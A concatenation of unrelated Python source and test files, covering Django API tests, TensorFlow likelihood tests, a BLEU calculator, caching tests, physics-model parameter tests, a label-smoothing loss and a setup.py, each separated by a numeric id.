from util.observe import Observable
from util.primitives.funcs import do
class SlotsSavable(object):
'''
Prereqs:
1) use slots
2) only store persistent information in slots
3) child objects stored in slots must also be SlotSavable (or pickleable)
'''
def __getstate__(self):
return dict((k, getattr(self, k)) for k in self.__slots__)
def __setstate__(self, info):
do(setattr(self, key, info.get(key, None)) for key in self.__slots__)
def __eq__(self, s):
try:
return all(getattr(self, attr) == getattr(s, attr) for attr in self.__slots__)
except Exception:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
val = 0
for child in [getattr(self, slot) for slot in self.__slots__]:
if isinstance(child, list):
for c in child:
val ^= c.__hash__()
elif isinstance(child, dict):
                for k, v in child.items():
val ^= v.__hash__()
else:
val ^= child.__hash__()
return val
class ObservableSlotsSavable(SlotsSavable, Observable):
'''
Prereqs:
1) use slots
2) only store persistent information in slots
3) child objects stored in slots must also be SlotSavable (or pickleable)
'''
def __init__(self):
Observable.__init__(self)
def __setstate__(self, info):
if not hasattr(self, 'observers'):
Observable.__init__(self)
return SlotsSavable.__setstate__(self, info)
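# Illustrative sketch, not part of the original module: a slotted subclass whose
# state round-trips through __getstate__/__setstate__ and compares equal.
if __name__ == "__main__":
    class Point(SlotsSavable):
        __slots__ = ('x', 'y')
        def __init__(self, x=0, y=0):
            self.x = x
            self.y = y
    p = Point(1, 2)
    q = Point()
    q.__setstate__(p.__getstate__())
    assert p == q and hash(p) == hash(q)
    print(q.__getstate__())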
|
1709473
|
from django.contrib.auth.models import User
from rest_framework.test import APITestCase
from rest_framework.reverse import reverse
from rest_framework import status
from rest_api.models import Repo
from datetime import datetime
from rest_api.tests.assertors import RepoAssertorNested, RepoAssertor
from rest_api.tests.common import vcr, create_platform
class RepoTests(APITestCase):
@vcr.use_cassette()
def test_get_repos_when_single_repo_saved(self):
"""
Ensure get repos returns one repo with all the expected fields
"""
create_repo()
url = reverse('repos')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
RepoAssertorNested.assertAllFields(self, response.data[0])
@vcr.use_cassette()
def test_get_repos_when_multiple_repos_saved(self):
"""
Ensure get repos returns multiple repos if there is more than one saved
"""
repos = [
create_repo(title="Repo 1"),
create_repo(title="Repo 2"),
create_repo(title="Repo 3"),
]
url = reverse('repos')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(repos), len(response.data))
for app_response in response.data:
RepoAssertorNested.assertAllFields(self, app_response)
def test_post_repos_empty_body(self):
"""
Ensure posting to repos when body is empty returns 400
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
url = reverse('repos')
response = self.client.post(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_repos_non_authenticated_fails(self):
"""
Check posting to repos without authentication return 401
"""
platform = create_platform()
data = make_repo_data_with_all_fields(platform.id)
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_repo_with_all_fields(self):
"""
Ensure we can create a new repo when sending a body that contains all the possible fields
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
platform = create_platform()
data = make_repo_data_with_all_fields(platform.id)
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
RepoAssertor.assertRequiredFields(self, response.data)
def test_post_repo_with_required_fields(self):
"""
Ensure we can create a new repo when sending a body that contains ONLY the required fields
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
data = make_repo_data_with_required_fields()
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
RepoAssertor.assertRequiredFields(self, response.data)
def test_post_repo_with_invalid_color(self):
"""
Sending an invalid color returns 400
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
data = make_repo_data_with_required_fields()
data['color'] = '#FFCC'
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Helper Methods and classes #
def create_repo(title='Best repo ever', platform=None):
if not platform:
platform = create_platform()
return Repo.objects.create(
title=title,
subtitle='Subtitle',
url='https://github.com/ivacf/archi',
start_date=datetime.now(),
end_date=datetime.now(),
image='media/images/image.png',
color='#FFFFFF',
platform=platform
)
def make_repo_data_with_required_fields():
return {
'title': 'Repo title',
'subtitle': 'Repo subtitle',
'url': 'http://ivanc.uk',
'start_date': '2016-01-15',
'color': '#FFFFFF'
}
def make_repo_data_with_all_fields(platform_id):
data = make_repo_data_with_required_fields()
data.update({
'end_date': '2016-06-15',
'platform': platform_id
})
return data
|
1709540
|
from unittest.mock import MagicMock
import pytest
import numpy as np
import scipy as sp
import scipy.stats
import tensorflow as tf
from decompose.likelihoods.normal2dLikelihood import Normal2dLikelihood
from decompose.tests.fixtures import device, dtype
from decompose.distributions.distribution import UpdateType
@pytest.fixture(scope="module",
params=[0, 1])
def f(request):
f = request.param
return(f)
@pytest.fixture(scope="module",
params=[UpdateType.ALL, UpdateType.ONLYLATENTS])
def updateType(request):
updateType = request.param
return(updateType)
def test_residuals(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
r = lh.residuals(U, data)
assert(r.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npr = sess.run(r)
assert(np.allclose(noise.flatten(), npr, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_loss(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
loss = lh.loss(U, data)
assert(loss.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
nploss = sess.run(loss)
assert(np.allclose(np.sum(noise**2), nploss, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_llh(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
llh = lh.llh(U, data)
assert(llh.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npllh = sess.run(llh)
llhgt = np.sum(sp.stats.norm(loc=0., scale=1./np.sqrt(tau)).logpdf(noise))
assert(np.allclose(llhgt, npllh, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_prepVars(device, f, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
npU = (np.random.normal(size=(K, M[0])).astype(npdtype),
np.random.normal(size=(K, M[1])).astype(npdtype))
U = (tf.constant(npU[0]), tf.constant(npU[1]))
npnoise = np.random.normal(size=M).astype(npdtype)
npdata = np.dot(npU[0].T, npU[1]) + npnoise
data = tf.constant(npdata, dtype=dtype)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
A, B, alpha = lh.prepVars(f, U, data)
assert(A.dtype == dtype)
assert(B.dtype == dtype)
assert(alpha.dtype.base_dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npA, npB, npalpha = sess.run([A, B, alpha])
if f == 0:
Agt = np.dot(npdata, npU[1].T)
Bgt = np.dot(npU[1], npU[1].T)
assert(np.allclose(Agt, npA, atol=1e-5, rtol=1e-5))
assert(np.allclose(Bgt, npB, atol=1e-5, rtol=1e-5))
assert(np.allclose(tau, npalpha, atol=1e-5, rtol=1e-5))
if f == 1:
Agt = np.dot(npdata.T, npU[0].T)
Bgt = np.dot(npU[0], npU[0].T)
assert(np.allclose(Agt, npA, atol=1e-5, rtol=1e-5))
assert(np.allclose(Bgt, npB, atol=1e-5, rtol=1e-5))
assert(np.allclose(tau, npalpha, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_update(device, f, updateType, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
npU = (np.random.normal(size=(K, M[0])).astype(npdtype),
np.random.normal(size=(K, M[1])).astype(npdtype))
U = (tf.constant(npU[0]), tf.constant(npU[1]))
npnoise = np.random.normal(size=M).astype(npdtype)
npdata = np.dot(npU[0].T, npU[1]) + npnoise
data = tf.constant(npdata, dtype=dtype)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, updateType=updateType)
lh.init(data=data)
lh.noiseDistribution.update = MagicMock()
residuals = tf.ones_like(data)
lh.residuals = MagicMock(return_value=residuals)
lh.update(U, data)
if updateType == UpdateType.ALL:
lh.residuals.assert_called_once()
lh.noiseDistribution.update.assert_called_once()
else:
lh.residuals.assert_not_called()
lh.noiseDistribution.update.assert_not_called()
tf.reset_default_graph()
|
1709560
|
from sacrebleu import corpus_bleu, TOKENIZERS, DEFAULT_TOKENIZER
from sumeval.metrics.lang.base_lang import BaseLang
from sumeval.metrics.lang import get_lang
class BLEUCalculator():
def __init__(self,
smooth_method="floor", smooth_value=0.01,
lowercase=False, use_effective_order=True,
lang="en"):
self.smooth_method = smooth_method
self.smooth_value = smooth_value
self.lowercase = lowercase
self.use_effective_order = use_effective_order
if isinstance(lang, str):
self.lang = lang
self._lang = get_lang(lang)
elif isinstance(lang, BaseLang):
self.lang = lang.lang
self._lang = lang
self._tokenizer = DEFAULT_TOKENIZER
if self.lang == "ja":
def tokenizer_ja(text):
words = self._lang.tokenize_with_preprocess(text)
return " ".join(words)
TOKENIZERS["ja"] = tokenizer_ja
self._tokenizer = "ja"
elif self.lang == "zh":
self._tokenizer = "zh"
def bleu(self, summary, references, score_only=True):
"""
Calculate BLEU score by sacrebleu.
Parameters
----------
summary: str
summary text
references: str or str[]
reference or references to evaluate summary
score_only: bool
when True, return only score
See Also
--------
https://github.com/mjpost/sacreBLEU
"""
if isinstance(summary, str):
_s = summary
_refs = references
if isinstance(references, list):
_s = [_s]
_refs = [references]
bleu = corpus_bleu(
_s, _refs,
smooth_method=self.smooth_method,
smooth_value=self.smooth_value,
force=False, lowercase=self.lowercase,
tokenize=self._tokenizer,
use_effective_order=self.use_effective_order)
else:
_s = " ".join(summary)
_refs = [[" ".join(r) for r in references]]
# already tokenized summary and references
bleu = corpus_bleu(
_s, _refs,
smooth_method=self.smooth_method,
smooth_value=self.smooth_value,
force=True, lowercase=self.lowercase,
tokenize="none",
use_effective_order=self.use_effective_order)
if score_only:
return bleu.score
else:
return bleu
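# Illustrative usage sketch, not part of the original module; the sentences
# below are made up purely for demonstration.
if __name__ == "__main__":
    calculator = BLEUCalculator(lang="en")
    score = calculator.bleu("the cat sat on the mat",
                            ["the cat is sitting on the mat"])
    print("BLEU:", score)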
|
1709595
|
from masonite.mail import Mailable
class __class__(Mailable):
def build(self):
return (
self.to("<EMAIL>")
.subject("Masonite 4")
.from_("<EMAIL>")
.text("Hello from Masonite!")
.html("<h1>Hello from Masonite!</h1>")
)
|
1709619
|
import dask.dataframe as dd
from hypernets.tabular import sklearn_ex as skex, dask_ex as dex, get_tool_box
from hypernets.tabular.cache import cache, CacheCallback
from hypernets.tabular.datasets import dsutils
from hypernets.utils import Counter
class CacheCounter(CacheCallback):
def __init__(self):
super(CacheCounter, self).__init__()
self.enter_counter = Counter()
self.apply_counter = Counter()
self.store_counter = Counter()
def on_enter(self, fn, *args, **kwargs):
self.enter_counter()
def on_apply(self, fn, cached_data, *args, **kwargs):
self.apply_counter()
def on_store(self, fn, cached_data, *args, **kwargs):
self.store_counter()
def reset(self):
self.enter_counter.reset()
self.apply_counter.reset()
self.store_counter.reset()
class CachedMultiLabelEncoder(skex.MultiLabelEncoder):
@cache(attr_keys='columns', attrs_to_restore='columns,encoders')
def fit_transform(self, X, *args):
return super().fit_transform(X, *args)
@cache(attr_keys='columns', attrs_to_restore='columns,encoders')
def fit_transform_as_tuple_result(self, X, *args):
Xt = super().fit_transform(X.copy(), *args)
return X, Xt
class CachedDaskMultiLabelEncoder(dex.MultiLabelEncoder):
cache_counter = CacheCounter()
@cache(attr_keys='columns',
attrs_to_restore='columns,dtype,categorical_columns_,non_categorical_columns_,categories_',
callbacks=cache_counter)
def fit_transform(self, X, *args):
return super().fit_transform(X, *args)
@cache(attr_keys='columns',
attrs_to_restore='columns,dtype,categorical_columns_,non_categorical_columns_,categories_',
callbacks=cache_counter)
def fit_transform_as_array(self, X, *args):
X = super().fit_transform(X, *args)
return X.to_dask_array(lengths=True)
def test_cache():
df = dsutils.load_bank()
t = skex.MultiLabelEncoder()
X = t.fit_transform(df.copy())
t1 = CachedMultiLabelEncoder()
X1 = t1.fit_transform(df.copy())
t2 = CachedMultiLabelEncoder()
X2 = t2.fit_transform(df.copy())
hasher = get_tool_box(df).data_hasher()
assert hasher(X) == hasher(X1) == hasher(X2)
t3 = CachedMultiLabelEncoder()
X3 = t3.fit_transform_as_tuple_result(df.copy())
t4 = CachedMultiLabelEncoder()
X4 = t4.fit_transform_as_tuple_result(df.copy())
assert isinstance(X3, (tuple, list))
assert isinstance(X4, (tuple, list))
assert hasher(X3[1]) == hasher(X4[1])
def test_cache_dask():
cache_counter = CachedDaskMultiLabelEncoder.cache_counter
df = dd.from_pandas(dsutils.load_bank(), npartitions=2)
t = dex.MultiLabelEncoder()
X = t.fit_transform(df.copy())
cache_counter.reset()
t1 = CachedDaskMultiLabelEncoder()
X1 = t1.fit_transform(df.copy())
t2 = CachedDaskMultiLabelEncoder()
X2 = t2.fit_transform(df.copy())
hasher = get_tool_box(df).data_hasher()
assert hasher(X) == hasher(X1) == hasher(X2)
assert cache_counter.enter_counter.value == 2
assert cache_counter.apply_counter.value <= 2
assert cache_counter.store_counter.value <= 2
assert cache_counter.apply_counter.value + cache_counter.store_counter.value == 2
cache_counter.reset()
t3 = CachedDaskMultiLabelEncoder()
X3 = t3.fit_transform_as_array(df.copy())
t4 = CachedDaskMultiLabelEncoder()
X4 = t4.fit_transform_as_array(df.copy())
assert hasher(X3) == hasher(X4)
assert cache_counter.enter_counter.value == 2
assert cache_counter.apply_counter.value <= 2
assert cache_counter.store_counter.value <= 2
assert cache_counter.apply_counter.value + cache_counter.store_counter.value == 2
|
1709651
|
from CGATReport.Tracker import *
class SpeciesCount(TrackerSQL):
def __call__(self, track, slice=None):
'''
return the number of reference genomes that
are aligned to
'''
genomes = self.execute(
"""SELECT count(*) FROM species_present_fa""").fetchone()[0]
return {"total_reference_genomes": genomes}
class Species(TrackerSQL):
def __call__(self, track, slice=None):
'''
return the number of reference genomes that
are aligned to
'''
return self.getAll("""SELECT * FROM species_present_fa""")
class KnownAlignments(TrackerSQL):
def __call__(self, track, slice=None):
'''
return picard stats results
'''
result = {}
for data in self.execute("""SELECT track, PCT_PF_READS_ALIGNED FROM known_genomes_picard_stats_alignment_summary_metrics"""):
result[data[0]] = data[1]
return result
|
1709677
|
import pytest
import numpy as np
from pytest import raises
from flare.struc import Structure
from flare.utils.parameter_helper import ParameterHelper
from flare.parameters import Parameters
def test_initialization():
"""
    simplest scenario
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"twobody": [1, 0.5],
"threebody": [1, 0.5],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
@pytest.mark.parametrize("ones", [True, False])
def test_initialization2(ones):
"""
check ones, random
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
ones=ones,
random=not ones,
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
@pytest.mark.parametrize("ones", [True, False])
def test_initialization_allsep(ones):
"""
check ones, random
"""
specie_list = ["C", "H", "O"]
pm = ParameterHelper(
species=specie_list,
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
allseparate=True,
ones=ones,
random=not ones,
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
name_list = []
for i in range(3):
name = pm.find_group("specie", specie_list[i])
assert name not in name_list
name_list += [name]
name_list = []
for i in range(3):
for j in range(i, 3):
name = pm.find_group("twobody", [specie_list[i], specie_list[j]])
assert name not in name_list
name_list += [name]
with raises(RuntimeError):
pm = ParameterHelper(
species=[],
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
allseparate=True,
ones=ones,
random=not ones,
)
def test_initialization3():
"""check group definition"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_initialization4():
"""check cut3b"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
cutoff_groups={"cut3b": [["*", "*"], ["O", "O"]]},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cut3b0": 5,
"cutoff_twobody": 2,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_initialization5():
"""check universal"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"sigma": 1,
"lengthscale": 0.5,
"cutoff_threebody": 3,
"cutoff_twobody": 2,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"sigma": 1.0,
"lengthscale": 0.5,
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_line():
pm = ParameterHelper(verbose="DEBUG")
pm.define_group("specie", "O", ["O"])
pm.define_group("specie", "C", ["C"])
pm.define_group("specie", "H", ["H"])
pm.define_group("twobody", "**", ["C", "H"])
pm.define_group("twobody", "OO", ["O", "O"], atomic_str=True)
pm.define_group("threebody", "***", ["O", "O", "C"])
pm.define_group("threebody", "OOO", ["O", "O", "O"])
pm.define_group("manybody", "1.5", ["C", "H"])
pm.define_group("manybody", "1.5", ["C", "O"])
pm.define_group("manybody", "1.5", ["O", "H"])
pm.define_group("manybody", "2", ["O", "O"])
pm.define_group("manybody", "2", ["H", "O"])
pm.define_group("manybody", "2.8", ["O", "O"])
pm.set_parameters("**", [1, 0.5])
pm.set_parameters("OO", [1, 0.5])
pm.set_parameters("***", [1, 0.5])
pm.set_parameters("OOO", [1, 0.5])
pm.set_parameters("1.5", [1, 0.5, 1.5])
pm.set_parameters("2", [1, 0.5, 2])
pm.set_parameters("2.8", [1, 0.5, 2.8])
pm.set_constraints("2", [True, False])
pm.set_constraints("2.8", False)
pm.set_parameters("cutoff_twobody", 5)
pm.set_parameters("cutoff_threebody", 4)
pm.set_parameters("cutoff_manybody", 3)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_line2():
pm = ParameterHelper(verbose="DEBUG")
pm.define_group("specie", "O", ["O"])
pm.define_group("specie", "rest", ["C", "H"])
pm.define_group("twobody", "**", ["*", "*"])
pm.define_group("twobody", "OO", ["O", "O"])
pm.define_group("threebody", "***", ["*", "*", "*"])
pm.define_group("threebody", "Oall", ["O", "O", "O"])
pm.set_parameters("**", [1, 0.5])
pm.set_parameters("OO", [1, 0.5])
pm.set_parameters("Oall", [1, 0.5])
pm.set_parameters("***", [1, 0.5])
pm.set_parameters("cutoff_twobody", 5)
pm.set_parameters("cutoff_threebody", 4)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", ["O", ["C", "N"], "H"])
pm.list_groups("twobody", [["*", "*"], ["O", "O"]])
pm.list_groups("threebody", [["*", "*", "*"], ["O", "O", "O"]])
pm.list_parameters(
{
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
}
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list2():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", {"s1": "O", "s2": ["C", "N"], "s3": "H"})
pm.list_groups("twobody", {"t0": ["*", "*"], "t1": [["s1", "s1"], ["s1", "s3"]]})
pm.list_groups("threebody", [["*", "*", "*"], ["s1", "s1", "s1"]])
pm.list_parameters(
{
"t0": [1, 0.5],
"t1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
}
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_generate_by_list_error():
pm = ParameterHelper(verbose="DEBUG")
pm.list_groups("specie", ["O", ["C", "N"], "H"])
with raises(RuntimeError):
pm.list_groups("specie", ["O", "C", "H"])
pm = ParameterHelper(verbose="DEBUG")
with raises(RuntimeError):
pm.list_groups("specie", "O")
pm = ParameterHelper(verbose="DEBUG")
with raises(RuntimeError):
pm.list_groups("specie", "O")
def test_opt():
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5, 1],
"twobody1": [2, 0.2, 2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
constraints={"twobody0": [False, True]},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
def test_from_dict():
pm = ParameterHelper(
species=["O", "C", "H"],
kernels=["twobody", "threebody"],
allseparate=True,
random=True,
parameters={"cutoff_twobody": 7, "cutoff_threebody": 4.5, "cutoff_manybody": 3},
verbose="debug",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
pm1 = ParameterHelper.from_dict(hm, verbose="debug", init_spec=["O", "C", "H"])
hm1 = pm1.as_dict()
Parameters.compare_dict(hm, hm1)
def test_constraints1():
"""
    simplest scenario
"""
pm = ParameterHelper(
species=["O", "C", "H"],
kernels={
"twobody": [["*", "*"], ["O", "O"]],
"threebody": [["*", "*", "*"], ["O", "O", "O"]],
},
parameters={
"twobody0": [1, 0.5],
"twobody1": [2, 0.2],
"threebody0": [1, 0.5],
"threebody1": [2, 0.2],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
},
constraints={
"twobody0": [True, False],
"threebody0": [False, True],
"noise": False,
},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
assert hm["train_noise"] is False
hyps = hm["hyps"]
assert len(hyps) == 6
assert hyps[0] == 1
assert hyps[1] == 2
assert hyps[2] == 0.2
assert hyps[3] == 2
assert hyps[4] == 0.5
assert hyps[5] == 0.2
def test_constraints2():
"""
    simplest scenario
"""
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"twobody": [1, 0.5],
"threebody": [1, 0.5],
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
constraints={"twobody": [True, False]},
verbose="DEBUG",
)
hm = pm.as_dict()
Parameters.check_instantiation(hm["hyps"], hm["cutoffs"], hm["kernels"], hm)
hyps = hm["hyps"]
assert hyps[0] == 1
assert hyps[1] == 1
def test_check_one_conflict():
"""
    simplest scenario
"""
with raises(RuntimeError):
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={"cutoff_twobody": 2, "cutoff_threebody": 1, "noise": 0.05},
ones=True,
random=True,
verbose="DEBUG",
)
with raises(RuntimeError):
pm = ParameterHelper(
kernels=["twobody", "threebody"],
parameters={
"sigma": 0.5,
"lengthscale": 1.0,
"cutoff_twobody": 2,
"cutoff_threebody": 1,
"noise": 0.05,
},
ones=True,
random=False,
verbose="DEBUG",
)
|
1709727
|
import pathlib
import pytest
from dotenv import load_dotenv
from app import create_app
from app.models import model
def clean_users():
# removing users will remove everything
# since all data linked into it
users = model.get_all("user")
for user in users:
user_id = user["id"]
model.delete(table="user", field="id", value=user_id)
@pytest.fixture
def client():
current_path = pathlib.Path(__file__)
dotenv_path = current_path.parents[2].joinpath(".env.example")
load_dotenv(dotenv_path)
app = create_app()
client = app.test_client()
yield client
# teardown
clean_users()
|
1709749
|
import torch
from torch import nn
class LabelSmoothing(nn.Module):
def __init__(self, size, smoothing=0.0):
super(LabelSmoothing, self).__init__()
        self.criterion = nn.KLDivLoss(reduction='mean')
        # log-probabilities are taken over the class dimension; forward()
        # asserts the input is laid out as (batch, classes)
        self.Logsoftmax = nn.LogSoftmax(dim=1)
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
self.size = size
self.true_dist = None
def forward(self, x, target):
assert x.size(1) == self.size
x = self.Logsoftmax(x)
true_dist = x.data.clone()
true_dist.fill_(self.smoothing / (self.size - 1))
true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
self.true_dist = true_dist
true_dist.requires_grad = False
return self.criterion(x, true_dist)
def SmoothedLabel(true_labels, classes, smoothing=0.0):
"""
if smoothing == 0, it's one-hot method
if 0 < smoothing < 1, it's smooth method
"""
assert 0 <= smoothing < 1
confidence = 1.0 - smoothing
label_shape = torch.Size((true_labels.size(0), classes))
with torch.no_grad():
true_dist = torch.empty(size=label_shape, device=true_labels.device)
true_dist.fill_(smoothing / (classes - 1))
true_dist.scatter_(1, true_labels.data.unsqueeze(1), confidence)
return true_dist
class CrossEntropyLoss(nn.Module):
def __init__(self, classes, smooth):
super(CrossEntropyLoss, self).__init__()
self.classes = classes
self.smooth = smooth
def forward(self, pred, labels):
labels = SmoothedLabel(labels, self.classes, self.smooth)
pred = pred.log_softmax(-1)
return torch.mean(torch.sum(-labels * pred, dim = -1))
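# Illustrative usage sketch, not part of the original module: compare the
# smoothed cross entropy above with hard-label nn.CrossEntropyLoss on random
# logits (batch size and class count are arbitrary).
if __name__ == "__main__":
    logits = torch.randn(4, 10)
    labels = torch.randint(0, 10, (4,))
    smoothed = CrossEntropyLoss(classes=10, smooth=0.1)
    print("smoothed CE  :", smoothed(logits, labels).item())
    print("hard-label CE:", nn.CrossEntropyLoss()(logits, labels).item())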
|
1709753
|
import io
from setuptools import setup, find_packages
def readme():
with io.open('README.md', encoding='utf-8') as f:
return f.read()
setup(
name="marketsimulator",
version="0.0.1",
author="<NAME> and <NAME>",
author_email='<EMAIL>',
license='MIT License',
description="Realistic market matching engine simulator \
for HFT trading strategies",
    long_description=readme(),
    long_description_content_type="text/markdown",
url="https://github.com/Surbeivol/PythonMatchingEngine",
packages=find_packages(),
install_requires=[
'cycler==0.10.0',
'kiwisolver==1.1.0',
'matplotlib==3.1.0',
'numpy==1.16.4',
'pandas==0.24.2',
'pyparsing==2.4.0',
'python-dateutil==2.8.0',
'pytz==2019.1',
'PyYAML==5.4',
'six==1.12.0',
'tqdm==4.32.2'
],
include_package_data=True,
classifiers=[
"Programmin Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
1709754
|
import os
import json
import logging
logger = logging.getLogger(__name__)
class ProjectSettings:
art_dir: str
assets_dir: str
ART_DIR = "art_dir"
ASSETS_DIR = "assets_dir"
PROJECT_ROOT_FILE_NAME = ".rafx_project"
def find_dir_containing_file_recursing_upwards(current_path, file_name):
if not os.path.isabs(current_path):
current_path = os.path.abspath(current_path)
if os.path.isfile(current_path):
dir_name = os.path.dirname(current_path)
return find_dir_containing_file_recursing_upwards(dir_name, file_name)
if os.path.isdir(current_path):
if os.path.exists(os.path.join(current_path, file_name)):
return current_path
else:
parent = os.path.dirname(current_path)
if parent == current_path:
return None
return find_dir_containing_file_recursing_upwards(parent, file_name)
